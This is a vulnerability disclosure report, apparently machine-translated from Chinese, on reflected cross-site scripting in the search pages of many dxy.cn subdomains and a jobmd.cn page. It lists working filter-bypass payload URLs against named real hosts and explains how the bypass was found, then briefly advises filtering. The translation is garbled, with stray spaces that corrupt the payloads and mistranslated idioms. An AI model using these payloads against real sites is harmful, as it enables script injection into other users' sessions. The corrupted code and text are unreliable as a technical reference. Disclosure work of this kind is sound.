Cross-reflection xss (analysis process) of all child stations in Clove Garden)

The search box in the clove garden is quite strange. When I encounter so many search boxes, some special characters such as <> or "are filtered out. Only a few sub-sites (many, almost all affected) are not filtered. Affected sites: http://meeting.dxy.cn/search.do?keywords=1 > <Script/src = "</script> alert (1) //" onmouseover = "alert (1) //> http://ihealth.dxy.cn/search.do?keywords=1 > <Script/src = "</script> alert (1) //" % 20 onmouseover = "alert (1) ///> http://heart.dxy.cn/search.do?keywords=1 > <Script/src = "</script> alert (1) //" % 20 onmouseover = "alert (1) ///> http://infect.dxy.cn/search.do?keywords=1 > <Script/src = "</script> alert (1) //" % 20 onmouseover = "alert (1) ///> http://endo.dxy.cn/search.do?keywords=1 > <Script/src = "</script> alert (1) //" % 20 onmouseover = "alert (1) ///> http://oncol.dxy.cn//search.do?keywords=1 > <Script/src = "</script> alert (1) //" % 20 onmouseover = "alert (1) ///> http://yao.dxy.cn/search.do?keywords=1%3E%3Cscript/src=%22%3C/script%3Ealert%281%29//%22% 20 onmouseover = % 22 alert % 281% 29 // % 3E http://6d.dxy.cn//search.do?keywords=1 > <Script/src = "</script> alert (1) //" % 20 onmouseover = "alert (1) ///> xss exists, maybe I have not completed the summary yet, and the students in the clove garden still need to check it by themselves. Enter <script> alert (1) </script> in the search box for testing. Detected: <script> <! [CDATA [alert (1)]> </script> at that time, it was difficult to make a breakthrough and did not know what his filtering method was. Later, I consulted a Daniel and finally executed the code based on my summary. We need to use the onmouseover event to execute the event. However, the number of affected sub-sites is large, so I gave the self-evaluation 10 rank with the above. We know that filtering without filtering special characters is incomplete. As a result, programmers in the clove garden have also made such a mistake. Therefore, we only need to construct the <script/src = "</script> alert (1) //" % 20 onmouseover = "alert (1) ////> you can bypass the restriction. Among them,> is closed. Of course, the angle brackets here are not filtered. Otherwise, you won't be able to execute anything in <script>. As we know, in js, </script> has the highest priority. It can interrupt js Code at any time. I don't know <script> <! [CDATA [alert (1)]> </script> Can I interrupt the logic? Finally, comment out the error. In combination with alert, the small window will pop up and then be sent to the XSS in another location: http://ent.jobmd.cn/search?keywords=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
 Solution:

You still have to filter it out. You cannot leave the door to the left. :) filter method: refer to the search box before you. Other problems are not found yet.